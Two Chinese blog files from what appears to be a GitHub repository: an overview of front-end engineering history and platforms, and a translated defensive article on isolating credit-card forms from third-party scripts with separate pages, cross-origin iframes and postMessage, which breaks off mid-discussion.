 11 | - [chrome扩展](#chrome扩展)
 12 | - [桌面应用](#桌面应用)
 13 | - [物联网（IOT）](#物联网（IOT）)
 14 | - [操作系统](#操作系统)
 15 | - [结语](#结语)
 16 | 
 17 | ## 简介
 18 | 
 19 | * 前端工程师
 20 | 
 21 | 从狭义上讲，前端工程师使用 HTML、CSS、Javascript 等专业技能和工具将产品UI设计稿实现成网站产品，涵盖用户PC端、移动端网页，处理视觉和交互问题。
 22 | 从广义上来讲，所有用户终端产品与视觉和交互有关的部分，都是前端工程师的专业领域。
 23 | 
 24 | * 大前端
 25 | 
 26 | 1、大前端 - 前后端分离
 27 | 
 28 | 随着前后端职责和技术框架的分离发展，产品对前端的要求越来越高，用户对前端的期待越来越高，前端技术发展越来越快，导致前端这个岗位并没有像JSP时代那种画画页面就完事了。这部分体现的是前端的要求更高，责任越大了。
 29 | 
 30 | 2、大前端 - Node全栈
 31 | 
 32 | 前后端分离后，前端要独立完成一个事情是不行的，因为缺少后台的支持。但是随着Node的出现，前端可以不用依赖后台人员，也不用学习新的后台语言，就可以轻松搞定后台的这部分事情。这样，面对一些小的系统，前端工程师就可以搞定整个系统。这部分体现了前端的全面性和全栈性。
 33 | 
 34 | 3、大前端 - 应对各种端
 35 | 
 36 | 传统的前端工程师，一般指网页开发工程师，网站一般指运行在PC浏览器，慢慢的也要运行在手机上。但是，随着移动互联网的发展，突然冒出来更多的移动设备，比如：手机分为Android手机和苹果手机、智能手表、VR/AR技术支撑的可穿戴设备、眼睛、头盔、车载系统、智能电视系统等等。而这些设备都需要前端的支撑，这时候对前端的技术要求、能力要求就更高。这部分体现了前端的涉猎范围变大。
 37 | 
 38 | 4、大前端 - 微应用
 39 | 
 40 | 当微信小程序出来以后，大家第一感觉是前端又可以火一把啦，不需要后台、不需要服务端，只需要在微信平台上开发网页就可以发布上线了。
 41 | 
 42 | 而近期又有国内多个手机厂家联合推出快应用 , 跟小程序差不多，只是通过简单的前端开发发布以后，用户不需要安装应用就可以直接在类似于小米、vivo、oppo等手机上打开这样的应用。
 43 | 
 44 | 类似于这些微应用，免后台、免安装的形式出现，也促使了前端这个行业也将涉及到这样的新型领域中，一起推动技术的进步。这部分体现了前端是时代发展的幸运儿
 45 | 
 46 | ## 前端发展史
 47 | * 1992年，万维网（WWW）是欧洲核子研究组织的一帮科学家为了方便看文档、传论文而创造的
 48 | 
 49 | * 1994年，这一年10月13日网景推出了第一版Navigator
 50 | 
 51 | * 1994年一个叫Rasmus Lerdorf的加拿大人为了维护个人网站而创建了PHP。
 52 | 
 53 | *  1995年，盘古开天辟地的一年，为了应付公司安排的任务，34岁的系统程序员Brendan Eich只用10天时间就把Javascript设计出来了。
 54 | 
 55 | 
 56 | > &ensp;&ensp;由于设计时间太短，语言的一些细节考虑得不够严谨，导致后来很长一段时间，Javascript写出来的程序混乱不堪。如果Brendan Eich预见到，未来这种语言会成为互联网第一大语言，全世界有几百万学习者，他会不会多花一点时间呢?
 57 | 
 58 | 2018Github最流行语言排行榜：
 59 | ![javascript](https://github.com/luke93h/git-blog/blob/master/imgs/webs/javascript.jpg?raw=true)
 60 | 
 61 | * 1995年，8月16日，微软推出IE 1.0浏览器。
 62 | 
 63 | * 1995年-1998年，第一次浏览器大战，ie获胜，Netscape以开放源代码的授权形式，把Communicator源代码发布
 64 | > &ensp;&ensp;在IE6之后，IE团队事实上就解散了，因为那时候的市场占有率已经非常高了，又没有看到竞争对手，所以领导层自然觉得，这个领域已经没什么好投资了。
 65 | 
 66 | * 2004，Firefox 浏览器诞生，开启“第二次浏览器大战”
 67 | 
 68 | > &ensp;&ensp;在Firefox真正成气候之后，微软重新组建了IE团队，尽管当时 Firefox 的性能远胜不思进取的 IE，但 Windows 的捆绑优势太强横，使 Firefox 一直没机会从后赶上。ie的市场份额始终保持在80%以上
 69 | 
 70 | * 2004年，gmail出现，2005年，ajax技术出现
 71 | 
 72 | * 2006年 John Resig发布了jQuery
 73 | 
 74 | * 2007年第一代iphone发布，2008年第一台安卓手机发布。悄然间互联网进入了移动时代。
 75 | 
 76 | * 2008年， Google 推出 Chrome 浏览器，推出V8引擎，js运行速度比同时期的FireFox快了2-3倍，比ie7快了几十倍，“第三次浏览器大战”开始
 77 | 
 78 | > &ensp;&ensp;其卓越的性能、简洁的介面以及捆绑 Google 搜寻的优势，快速攻城掠地，除了侵蚀原有属于 Firefox 的市场之外，也同时痛殴老旧的微软 IE。到了 2012 年，Google Chrome 在 流量统计机构 Statcounter 的数量里终于超越 IE，成为全球第一大浏览器。
 79 | 
 80 |   &ensp;&ensp;&ensp;最新浏览器份额统计：
 81 | ![webs](https://github.com/luke93h/git-blog/blob/master/imgs/webs/browser.png?raw=true)
 82 |   &ensp;&ensp;&ensp;可以看到，在第三次浏览器大战中，ie份额从80%多一直跌倒了20%不到，甚至下跌的趋势并没有得到缓解。
 83 | 
 84 | * 2009年Ryan Dahl发布了node
 85 | 
 86 |   > &ensp;&ensp;基于nodejs带给人们的希望，出现了阿特伍德定律：
 87 |   > &ensp;&ensp;any application that can be written in JavaScript, will eventually be written in JavaScript
 88 | 
 89 | 
 90 | * 2014年，第五代HTML标准发布。
 91 | 
 92 | ## web
 93 | 
 94 | ### Web1.0
 95 | 
 96 | &ensp;&ensp;简单来说就是"唯读"的网络世界，
 97 | 
 98 | &ensp;&ensp;电视、杂志、书籍、静态网页这类的都可以被归在此类。
 99 | ![webs](https://github.com/luke93h/git-blog/blob/master/imgs/webs/web1.png?raw=true)
100 | 
101 | ### Web2.0
102 | 
103 | &ensp;&ensp;在这个世代，网路变成互动的形式了，大家可以同时当讯息的接收者，以及讯息的製造者。
104 | 
105 | &ensp;&ensp;代表性技术：ajax，jq
106 | 
107 | &ensp;&ensp;产品：人人网、微博、百度...等都属于此种。
108 | ![webs](https://github.com/luke93h/git-blog/blob/master/imgs/webs/web2.JPEG?raw=true)
109 | 
110 | ### Web3.0
111 | 
112 | &ensp;&ensp;我理解的web3.0是在web2.0的基础上运用先进的技术，工程化的管理，完成高复杂度的项目。
113 | 与服务器端语言先慢后快的学习曲线相比，前端开发的学习曲线是先快后慢
114 | 
115 | &ensp;&ensp;代表性技术：react，vue，nodejs，html5，webapck，es6，babel，nodejs，less...
116 | 
117 | &ensp;&ensp;产品：知乎，斗鱼网页版，facebook，阿里云...
118 | ![webs](https://github.com/luke93h/git-blog/blob/master/imgs/webs/web3.JPEG?raw=true)
119 | 
120 | ### 未来的web
121 | 
122 | 随着webgl的加入，web拥有了游戏开发的可能。
123 | 
124 | * [chrome实验室](https://experiments.withgoogle.com/collection/chrome)
125 | * [Fluid](https://paveldogreat.github.io/WebGL-Fluid-Simulation/)
126 | * [scanseqjs](https://jeonghopark.github.io/scanseqjs/)
127 | * [刺客信条](http://race.assassinscreedpirates.com/)
128 | 
129 | ## 移动端
130 | 
131 | ### Native App
132 | 
133 | 即原生开发模式,开发出来的是原生程序,不同平台上,Android和iOS的开发方法不同,开发出来的是一个独立的APP,能发布应用商店,有如下优点和缺点
134 | 
135 | 优势：
136 | * 直接依托于操作系统,交互性最强,性能最好
137 | * 功能最为强大,特别是在与系统交互中,几乎所有功能都能实现 
138 | 
139 | 劣势：
140 | * 开发成本高,无法跨平台,不同平台Android和iOS上都要各自独立开发
141 | * 门槛较高,原生人员有一定的入门门槛,相比广大的前端人员而言,较少
142 | * 更新缓慢,特别是发布应用商店后,需要等到审核周期
143 | * 维护成本高
144 | 
145 | 代表产品：绝大多数大厂APP
146 | 
147 | ### Web App
148 | 
149 | 即移动端的网站,将页面部署在服务器上,然后用户使用各大浏览器访问,不是独立APP,无法安装和发布
150 | 
151 | Web网站一般分两种,MPA(Multi-page Application)和SPA(Single-page Application)。而Web App一般泛指后面的SPA形式开发出的网站(因为可以模仿一些APP的特性),有如下优点和缺点 
152 | 
153 | 优势：
154 | * 开发成本低,可以跨平台,调试方便
155 | * 维护成本低
156 | * 更新最为快速  
157 | 
158 | 劣势：
159 | * 性能低,用户体验差
160 | * 依赖于网络,页面访问速度慢,耗费流量
161 | * 功能受限,大量功能无法实现
162 | * 临时性入口,用户留存率低
163 | 
164 | ### Hybrid App：
165 | 
166 | 即混合开发,也就是半原生半Web的开发模式,有跨平台效果,当然了,实质最终发布的仍然是独立的原生APP(各种的平台有各种的SDK),有如下优点和缺点
167 | 
168 | 优势：
169 | 1. 开发成本较低,可以跨平台,调试方便
170 | 2. 维护成本低,功能可复用
171 | 3. 更新较为自由
172 | 4. 针对新手友好,学习成本较低
173 | 5. 功能更加完善,性能和体验要比起web app好太多
174 | 6. 部分性能要求的页面可用原生实现
175 | 
176 | 劣势：
177 | 1. 相比原生,性能仍然有较大损耗
178 | 2. 不适用于交互性较强的app
179 | 
180 | ### React Native App
181 | 
182 | Facebook发起的开源的一套新的APP开发方案,Facebook在当初深入研究Hybrid开发后,觉得这种模式有先天的缺陷,所以果断放弃,转而自行研究,后来推出了自己的“React Native”方案,不同于H5,也不同于原生,更像是用JS写出原生应用,有如下优点和缺点
183 | 
184 | 
185 | 优势：
186 | 
187 | 1. 虽然说开发成本大于Hybrid模式,但是小于原生模式,大部分代码可复用
188 | 2. 性能体验高于Hybrid,不逊色与原生
189 | 3. 开发人员单一技术栈,一次学习,跨平台开发
190 | 4. 社区繁荣,遇到问题容易解决
191 | 
192 | 劣势：
193 | 1. 虽然可以部分跨平台,但并不是Hybrid中的一次编写,两次运行那种,而是不同平台代码有所区别
194 | 2. 开发人员学习有一定成本
195 | 
196 | ### 小程序
197 | 
198 | 张小龙在朋友圈里这样解释道：小程序是一种不需要下载安装即可使用的应用，它实现了应用「触手可及」的梦想，用户扫一扫或搜一下即可打开应用。也体现了「用完即走」的理念，用户不用关心是否安装太多应用的问题。应用将无处不在，随时可用，但又无需安装卸载。
199 | 
200 | 优势：
201 | 1. 不用安装，即开即用，用完就走。省流量，省安装时间，不占用桌面；
202 | 2. 对于小程序拥有者来说，开发成本更低，他们可以更多财力，人力，精力放在如何运营好产品，做好内容本身；
203 | 3. 背靠微信/支付宝，更容易引流
204 | 
205 | 
206 | 劣势：
207 | 1. 体验上虽然没法完全媲美原生APP，但综合考虑还是更优；
208 | 2. 微信小程序的推广和发展受微信平台的限制、不利于微信小程序的普及和全球化。
209 | 3. 微信小程序功能太过简单,某些核心功能方面都没能完善
210 | 4. 微信小程序优化不足。比如很多微信小程序打开就有明显的卡顿现象
211 | 
212 | ### 快应用
213 | 
214 | 微信小程序推出已经一年多，不但在轻应用市场的表现十分抢眼，而且还在一步步蚕食传统硬件厂商的应用分发市场的入口和流量。在应用分发市场被入侵的形势下，今年3月20日十大国产手机厂商联合发布了“快应用”标准，正式与微信小程序展开竞争。
215 | 
216 | 优势：
217 | 1. 快应用标准统一，利于大面积推广。
218 | 2. 更符合用户和系统习惯。
219 | 3. 潜在用户量极大。
220 | 
221 | 劣势：
222 | 1. 各手机厂商貌合神离，导致快应用仍存在一些问题。
223 | 2. 用户粘性不高。
224 | 3. 快应用入口寻之不易。
225 | 
226 | ### pwa
227 | 
228 | Progressive Web App, 简称 PWA，是渐进式提升 Web App 的体验的一种新方法，能给用户原生应用的体验。
229 | 
230 | PWA 本质上是 Web App，就是运行在手机上的App不是纯Native的，而是很多页面都是网页。
231 | 
232 | 
233 | ## 前端工程化
234 | 
235 | 前端工程化是根据业务特点，将前端开发流程规范化，标准化，它包括了开发流程，技术选型，代码规范，构建发布等，用于提升前端工程师的开发效率和代码质量，最终交付一个稳定性高、扩展性好、易于维护的系统的过程。
236 | 
237 | 
238 | Web应用的复杂程度与日俱增，用户对其前端界面也提出了更高的要求，但时至今日仍然没有多少前端开发者会从软件工程的角度去思考前端开发，来助力团队的开发效率，更有甚者还对前端保留着”如玩具般简单“的刻板印象，日复一日，刀耕火种。
239 | 
240 | 为什么要追求工程化，可以看下这个故事：[地狱级项目](https://zhuanlan.zhihu.com/p/39827365)
241 | 
242 | 工程化可以从4个方面着手：模块化、组件化、自动化、规范化。
243 | 
244 | 1. 模块化：就是将一个大文件拆分成相互依赖的小文件，再进行统一的拼装和加载。
245 | 
246 | &ensp;&ensp;&ensp;&ensp;工具：webpack,gulp,rollup
247 | 
248 | 2. 组件化：模板化是在文件层面上，对代码和资源的拆分；组件化是在设计层面上，对于UI的拆分。
249 | 
250 | &ensp;&ensp;&ensp;&ensp;工具：react，vue，angular
251 | 
252 | 3. 自动化：“简单重复的工作交给机器来做”，自动化也就是有很多自动化工具代替我们来完成
253 | 持续集成、自动化构建、自动化部署、自动化测试等等。
254 | &ensp;&ensp;&ensp;&ensp;工具：husky,travis,ci/cd,jest
255 | 4. 规范化：在项目规划初期制定的好坏对于后期的开发有一定影响。包括的规范有：目录结构、编码规范、前后端接口规范等等
256 | 
257 | &ensp;&ensp;&ensp;&ensp;工具：eslint，prettier
258 | 
259 | ## 二维动画(canvas)
260 | 
261 | 1. [echarts](http://gallery.echartsjs.com/explore.html#sort=rank~timeframe=all~author=all)
262 | 2. [25 超棒的 HTML5 Canvas 游戏](https://www.oschina.net/news/20143/top-25-best-html5-canvas-games-you-love-to-play)
263 | 
264 | ## 三维动画(webgl)
265 | 
266 | 1. [three.js](https://threejs.org/)
267 | 2. [chrome实验室](https://experiments.withgoogle.com/collection/chrome)
268 | 
269 | ## 桌面应用
270 | Electron 与 NW.js 相似，提供了一个能通过 JavaScript 和 HTML 创建桌面应用的平台，同时集成 Node 来授予网页访问底层系统的权限。
271 | 
272 | 为什么要用html来开发桌面应用：
273 | 主要是UI，经过多年发展，web端的UI组件丰富度，美观度远超传统程序，加上web端代码容易分享，好共用，好定制，开发人员多好找人，所以以web为主导的公司，开发桌面程序就直接使用浏览器技术做UI层是自然的选择
274 | 
275 | 1. electron
276 | 2. NW（前身为node-webkit）
277 | 
278 | 产品：微信小程序开发ide、支付宝小程序开发ide、网易云音乐
279 | 
280 | ## chrome扩展
281 | 
282 | ### chrome extension是什么
283 | 
284 | 1. chrome extension开发成本低，由一些文件（包括 HTML、CSS、JavaScript、图片以及其他任何您需要的文件）经过 zip 打包得到，本质上是网页。
285 | 2. chrome extension不仅可以利用[浏览器为网页提供的所有 API](https://crxdoc-zh.appspot.com/extensions/api_other)，还可以用[chrome为扩展程序提供了许多专用 API](https://crxdoc-zh.appspot.com/extensions/api_index)。
286 | 
287 | ### 为什么要用chrome extension
288 | 
289 | 1. 有些场景下，我们并不是网页的开发者，但想要为网站添加更多的功能，这时候也可以用chrome extension来解决。
290 | 2. chrome extension拥有比网页更加丰富的api
291 | 
292 | ### chrome扩展能做什么
293 | 
294 | 1. 代理：[Proxy SwitchyOmega](https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif)
295 | 2. 开发者工具: [react](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi)、[redux](https://chrome.google.com/webstore/detail/redux-devtools/lmhkpmbekcpmknklioeibfkpmmfibljd)
296 | 3. 广告过滤：[AdGuard 广告拦截器](https://chrome.google.com/webstore/detail/adguard-adblocker/bgnkhhnnamicmpeenaelnjfhikgbkllg)
297 | 4. 抢票软件：[台湾高铁抢票插件](https://chrome.google.com/webstore/detail/%E5%8F%B0%E6%B9%BE%E9%AB%98%E9%93%81%E6%8A%A2%E7%A5%A8%E6%8F%92%E4%BB%B6/nfkfaajobpcjpmcmpcacncimfmjppgoj)
298 | 5. 视频下载: [优酷一键通](https://chrome.google.com/webstore/detail/%E4%BC%98%E9%85%B7%E4%B8%80%E9%94%AE%E9%80%9A/alddjbjplgobbllfolehibiclbhmomla)
299 | 6. 更多：[chrome应用商店](https://chrome.google.com/webstore/category/extensions?hl=zh-CN)
300 | 
301 | ### 如何开发
302 | 
303 | 参考[chrome扩展简介](https://github.com/luke93h/git-blog/issues/20)
304 | 
305 | ## 物联网（IOT）
306 | 
307 | 我们总说IOT，那到底什么是IOT？IOT是Internet of Things的缩写，字面翻译是“物体组成的因特网”，准确的翻译应该为“物联网”。物联网(Internet of Things)又称传感网，简要讲就是互联网从人向物的延伸。
308 | 
309 | JavaScript IoT应用开发平台:
310 | 
311 | JavaScript IoT应用开发平台，其建设初衷是让开发者能够用JavaScript开发IoT应用，一方面可以更好地构建抽象，另一方面，可以将比较现代的开发方式引入到硬件研发中。
312 | 
313 | ## 操作系统
314 | 
315 | [OS.JS](https://link.zhihu.com/?target=https%3A//www.os-js.org/)
316 | 
317 | ## 结语
318 | 
319 | 技术的根本追求是解决问题，希望通过这次分享能给大家解决问题带来更多的解决思路
320 | 
321 | ## 参考
322 | 
323 | [当我们在谈大前端的时候，我们谈的是什么](http://www.infoq.com/cn/articles/talking-about-daqianduan)
324 | [前端发展史](https://www.cnblogs.com/kidney/p/6079530.html)
325 | [前端简史](https://zhuanlan.zhihu.com/p/29924966)
326 | [月影谈:写给想成为前端工程师的同学们](https://blog.csdn.net/cao610374598/article/details/51767562)
327 | [Web1.0、Web2.0和Web3.0](http://misswufunedu.pixnet.net/blog/post/117310858-web1.0%2Aweb2.0%2A-web3.0)
328 | [Hybrid APP开发的优缺点分析](http://www.kingyon.com/1001/24/74.html)
329 | [Hybrid APP基础篇(二)->Native、Hybrid、React Native、Web App方案的分析比较](https://www.cnblogs.com/dailc/p/5930238.html)
330 | [微信小程序的优势和缺点](https://zhuanlan.zhihu.com/p/30689180)
331 | [微信小程序与快应用之间的优势和劣势，谁更强？](https://m.hishop.com.cn/xiaocx/show_58468.html)
332 | [维护一个大型开源项目是怎样的体验？](https://www.zhihu.com/question/36292298/answer/102418523)
333 | [我眼中的 Electron](https://segmentfault.com/a/1190000008205112)
334 | [前端工程——基础篇](https://github.com/fouber/blog/issues/10)
335 | [大前端的技术原理和变迁史](https://github.com/sunmaobin/sunmaobin.github.io/issues/56)
336 | [不要争了！技术选择没那么重要](https://blog.fundebug.com/2018/07/19/technology-selection-is-not-critical/)
337 | 


--------------------------------------------------------------------------------
/src/如何阻止我从您的网站收集信用卡号码和密码.md:
--------------------------------------------------------------------------------
  1 | # 如何阻止我从您的网站收集信用卡号码和密码
  2 | 
  3 | > 译者：原文地址-[Part 2: How to stop me harvesting credit card numbers and passwords from your site](https://hackernoon.com/part-2-how-to-stop-me-harvesting-credit-card-numbers-and-passwords-from-your-site-844f739659b9)，以下为译文：
  4 | 
  5 | 我最近写了[一篇文章](https://hackernoon.com/part-2-how-to-stop-me-harvesting-credit-card-numbers-and-passwords-from-your-site-844f739659b9)（[译文](https://github.com/luke93h/git-blog/issues/22)），描述了我如何注入恶意代码，这些代码以一种很难检测到的方式从数千个网站收集信用卡号和密码。
  6 | 
  7 | 这篇文章收到的评论让我感到高兴，比如“不寒而栗”，“令人不安”和“可怕至极”等情感。（就像我在舞池上收到的赞美一样。）
  8 | 
  9 | 在这篇文章中，我会提出一些实用的建议。
 10 | 
 11 | # 概要
 12 | 
 13 | * 没必要杜绝第三方代码
 14 | * 敏感信息，请放在单独的HTML文件中处理，并确保该html中没有第三方代码。
 15 | * 在iframe中加载该html
 16 | * 从不同域上的静服务器提供此html
 17 | * 您还可以考虑通过使用第三方登录和第三方处理信用卡来完全避免敏感数据。
 18 | 
 19 | 我在这篇文章中建议的东西只适用于敏感信息（密码，信用卡号等）非常有限且可以隔离开的网站。如果的网页是聊天应用或邮箱客户端或数据库界面（所有数据是敏感的），我无能为力。
 20 | 
 21 | # 十八倍长的版本
 22 | 
 23 | 我认为适当的忧虑是不错的开始。
 24 | 
 25 | 我建议您想象一下，当您看到OnePlus [最近发布的公告](https://forums.oneplus.com/threads/jan-19-update-an-update-on-credit-card-security.752415/)时，会是什么样的感觉：
 26 | 
 27 | > ...支付页面被注入恶意脚本，信用卡信息泄漏...恶意脚本间歇性地操作，直接从用户的浏览器盗窃数据... oneplus.net上的多达40k用户可能会受到影响
 28 | 
 29 | ***
 30 | 
 31 | 现在让我把用更具象的东西来体现这种模糊的恐惧感。
 32 | 
 33 | 也许动物会有用......
 34 | 
 35 | 如果把第三方代码比作一个条杜宾犬。尽管它看起来平静，温柔。但是在它那黑色，温柔的眼睛里，有一种未知的闪烁。我只想说，我不会把我珍爱的东西放在它的附近。
 36 | 
 37 | 用户的敏感信息描可以看做一只可爱的小仓鼠。我看着它无辜地舔着它的小前脚，梳理它愚蠢的小脸，小仓鼠完全没有注意到杜宾犬，并在杜宾犬面前随意嬉戏。
 38 | 
 39 | 如果你曾经养过杜宾犬（我强烈推荐），你可能知道他们是美妙，温和的生物，不应该得此恶名。尽管如此，我相信你依旧会同意，让小仓鼠和杜宾犬独处是个坏主意。
 40 | 
 41 | 当然，你下班回到家后，也许会看到Bagnt Pants教授在Chompers中士的背上睡着的可爱场景。当然，更可能的事仓鼠的位置啥也没了，只剩下一只头歪向一边的狗，好像在问“今天我的甜点是什么呢？”
 42 | 
 43 | ***
 44 | 
 45 | 我不认为来自npm，GTM或DFP或其他任何地方的代码应该被贴上不安全的标签。但我建议，除非你能保证这段代码是可信的，否则将其与用户的敏感信息放在一起是不负责任的。
 46 | 
 47 | 所以...这就是我建议大家采用的策略：敏感信息和第三方代码不应该同时存在。
 48 | 
 49 | ## 例子：修复一个易受攻击的网站
 50 | 
 51 | 此示例中的网站中有易受第三方恶意代码攻击的信用卡表单，就像您可能认为在安全性方面更好的几个非常大的电子商务网站上的那些。
 52 | 
 53 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/anquan.png?raw=true)
 54 | 
 55 | 此页面充满了第三方代码。它使用了React，并通过Create React App创建，所以它在我开始之前有886个npm包（严重）。
 56 | 
 57 | 它也有谷歌标签管理器（ Google Tag Manager，它可以让陌生人在你的网站中注入JavaScript，而不需要经过代码审查）。
 58 | 
 59 | 另外，我这里还有一个横幅广告。这是互联网上的一则广告，因此需要分请求布在112个网络请求上总共1.5 MB的JavaScript，这导致有11秒的时间完全倾斜在CPU上，以加载单个动画gif，于此同时信用卡信息会飞一般被发送出去。
 60 | 
 61 | （吐槽：为此我对谷歌很失望。他们的开发人员花很多时间教我们如何快速制作网页;在这里减掉几万字节，在那里优化几毫秒 - 这些都是很棒的优化。但同时他们允许DFP广告联盟向用户的设备发送数兆资源，发起数百个网络请求，导致数秒时间CPU被塞满。谷歌，我期待您能提供更加合理，快捷的广告投放方式。）
 62 | 
 63 | ***
 64 | 
 65 | 好的，回到正题......显然，我需要做的是把用户的敏感信息保护起来，远离所有第三方恶意代码 ; 我希望它们能待在属于自己的小岛上。就像这样：
 66 | 
 67 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/xiaodao.jpeg?raw=true)
 68 | 
 69 | 现在，你已经看完了本文的2/5，我将开始讲述一些实用的方法。
 70 | 
 71 | * 选项1：将信用卡表单移动到没有第三方JavaScript的document中，并将其作为单独的页面
 72 | * 选项2：选项1的基础上，页面在iframe中提供
 73 | * 选项3：选项2的基础上，父页面和iframe通过postMessage相互通信 
 74 | 
 75 | ## 选项1：处理敏感数据的单独页面
 76 | 
 77 | 最简单的方法是创建一个没有JavaScript的全新页面。
 78 | 
 79 | ![yewai](https://github.com/luke93h/git-blog/blob/master/imgs/anquan1.png?raw=true)
 80 | 
 81 | 不幸的是，因为我的网站的页眉，页脚和导航都是React组件，所以我不能在这个页面上使用它们。所以你看到的'标题'是我的完整标题的手动复制，没有所有常用功能。只是一个蓝色矩形。
 82 | 
 83 | 当用户填完表格时，他们会点击提交，并重定向到下一个页面。这可能需要进行一些后端验证，以处理们在页面中提交的数据。
 84 | 
 85 | 为了让这个文件保持漂亮和苗条，我使用原生的表单验证，而不是JavaScript ，而且由于required和pattern属性，达到JavaScript验证般的体验需要花费很大的精力。
 86 | 
 87 | 如果你想看到它的实际效果，[示例在这里](https://codepen.io/davidgilbertson/pen/OzdEbL)。
 88 | 
 89 | ***
 90 | 
 91 | 如果您打算这样做，我建议把所有代码全部保存在一个文件中。
 92 | 
 93 | 复杂性是这里的敌人。上面例子的HTML文件 - 嵌入在<style\>标签中的CSS - 大约有100行; 因为它太小而且没有发起网络请求，所以几乎不可能在未被发现的情况下干涉代码。
 94 | 
 95 | 不幸的是，这种方法需要复制CSS。我已经想了很久了，并想出了几种方法。如果想要能避免重复的代码，这其中的逻辑会需要比这几行css本身更多的代码。
 96 | 
 97 | “不要写重复的代码”极好的指导，但它不应被视为必须遵守。在极少数情况下，如此处所述，重复的代码是两害中的较小者。
 98 | 
 99 | 最有用的规则是您知道何时打破规则。
100 | 
101 | ## 选项2：在选项1的基础上，应用iframe
102 | 
103 | 第一种选择是好的，但是对UI和UX，有一定的损失，但别人拿走用户的钱往往是在最后一步执行。
104 | 
105 | 选项2通过将表单放在iframe中来解决此问题。
106 | 
107 | 你可能会这样做：
108 | 
109 | ```jsx
110 | <iframe
111 |   src = '/credit-card-form.html '
112 |   title = 'credit card'
113 |   height = ' 460 '
114 |   width = ' 400 '
115 |   frameBorder = ' 0 '
116 |   scrolling = ' no '
117 | />
118 | ```
119 | 
120 | 在该示例中，父页面和iframe的内容仍然可以自由地看到彼此并且彼此交互。这就像把一个杜宾犬放在一个房间里，仓鼠放在另一个房间里，在他们之间有一扇门，当杜宾犬饿的慌时时，它只需要简单地推开门。
121 | 
122 | > 译者：通过document.getElementById('iframe的ID').contentWindow.document，可以获取iframe中的document
123 | 
124 | 我需要的是iframe保持沙盒模式。它（我刚学会）与iframe 的sandbox属性无关，因为那是关于从iframe中保护父页面。我想要的是从父页面中保护iframe的内容。
125 | 
126 | 幸运的是，浏览器对不同来源的内容存在内在的不信任感。它被称为同源政策 。
127 | 
128 | 因此，只需从不同的域加载帧就足以阻止两者之间的通信。
129 | 
130 | ```jsx
131 | 
132 | <iframe
133 |   src = ' https://different.domain.com/credit-card-form.html '
134 |   title = '信用卡表'
135 |   height = ' 460 '
136 |   width = ' 400 '
137 |   frameBorder = ' 0 '
138 |   scrolling = ' no '
139 | />
140 | ```
141 | 
142 | 如果你想知道某个iframe内容的可访问性（a、对你有好处，b、以后不会再疑惑）。根据WebAIM的说法：内联的iframe并没有什么可访问性问题。内联iframe的内容在遇到它时（基于标记顺序）读取，就好像它是父页面中的内容一样。
143 | 
144 | ***
145 | 
146 | 让我们考虑表单填写完后会发生什么。用户将点击iframe中的提交按钮，我希望它能够导航父页面。但如果它们的源不同，这可能吗？
147 | 
148 | 是的，这就是表单target属性的用途：
149 | 
150 | ```jsx
151 | <form
152 |   action="/pay-for-the-thing"
153 |   method="post"
154 |   target="_top"
155 | >
156 |   <!-- form fields -->
157 | </form>
158 | ```
159 | 
160 | 因此，用户可以将其敏感信息键入到与周围页面无缝匹配的表单中。然后，当他们提交时，顶层页面将被重定向以响应表单提交。
161 | 
162 | 选项2是安全性的巨大提升 - 我不再拥有的信用卡表单不在容易被攻击。但它在可用性方面仍然有退步。
163 | 
164 | 理想的解决方案不需要任何重定向...
165 | 
166 | 选项3：iframe和父页面之间的沟通
167 | 
168 | 在我的示例网站中，我实际上希望能保留信用卡数据的数据，以及正在购买的产品的详情，并通过AJAX提交所有信息。
169 | 
170 | 这非常容易。我将用postMessage将表单中的数据发送到父页面。
171 | 
172 | 这是iframe中提供的页面...
173 | 
174 | ```jsx
175 | 
176 | <body>
177 |   <form id="form">
178 |     
179 |     <!-- form stuff in here -->
180 |     
181 |   </form>
182 | 
183 |   <script>
184 |     var form = document.getElementById('form');
185 |     form.addEventListener('submit', function(e) {
186 |       e.preventDefault();
187 |       var payload = {
188 |         type: 'bananas',
189 |         formData: {
190 |           a: form.ccname.value,
191 |           b: form.cardnumber.value,
192 |           c: form.cvc.value,
193 |           d: form['cc-exp'].value,
194 |         },
195 |       };
196 |       window.parent.postMessage(payload, 'https://mysite.com');
197 |     });
198 |   </script>
199 | </body>
200 | ```
201 | 
202 | ...并且在父页面中（或者更具体地说，在首先请求iframe的React组件中），我只是监听来自iframe的消息并相应地更新状态：
203 | 
204 | ```jsx
205 | class CreditCardFormWrapper extends PureComponent {
206 |   componentDidMount() {
207 |     window.addEventListener('message', ({ data }) => {
208 |       if (data.type === 'bananas') {
209 |         this.setState(data.formData);
210 |       }
211 |     });
212 |   }
213 | 
214 |   render() {
215 |     return (
216 |       <iframe
217 |         src="https://secure.mysite.com/credit-card-form.html"
218 |         title="credit card form"
219 |         height="460"
220 |         width="400"
221 |         frameBorder="0"
222 |         scrolling="no"
223 |       />
224 |     );
225 |   }
226 | }
227 | ```
228 | 
229 | 如果有需要，我可以在onchange每个输入单独的事件中将数据从表单发送到父级。
230 | 
231 | 虽然我很活跃，但没有什么能阻止父页面进行一些验证并将有效状态发送回简单的Jane表单。这允许我重用我站点中其他地方的任何验证逻辑。
232 | 
233 | > 有两位聪明的朋友建议iFrame可以提交数据，无需重定向父页面，然后使用成功/失败状态回传给父页面postMessage。这样，就不会有任何数据发送到父页面。
234 | 
235 | > 译者：也可以将加密后的表单数据传给父页面，避免有第三方代码监听message事件
236 | 
237 | 就是这样了！您用户的敏感信息可以安全地输入到不同来源的iframe中，隐藏在父页面之外，但捕获的数据仍然可以是应用状态的一部分，这意味着用户体验上没有任何改变。
238 | 
239 | ***
240 | 
241 | 此时，您可能会认为将信用卡数据发送到父页面会使整个任务失效。那么它是否可以被任何恶意代码访问？
242 | 
243 | 这个答案可以分为两个部分来讲。
244 | 
245 | 从黑客的角度来看，我认为这是一个可以接受的风险。想象一下，你的工作是想出一些可以在任何网站上运行的恶意代码，寻找敏感信息并将其发送到某个服务器。但每次发送东西时，都有被抓住的风险。因此，必须发送确定有价值的数据才符合黑客的最佳利益。
246 | 
247 | 如果我是那个黑客，当数以千计的网站具有完全脆弱的信用卡表单，并且带有整齐标记的输入时，我没必要去监听message事件，来截获数据。
248 | 
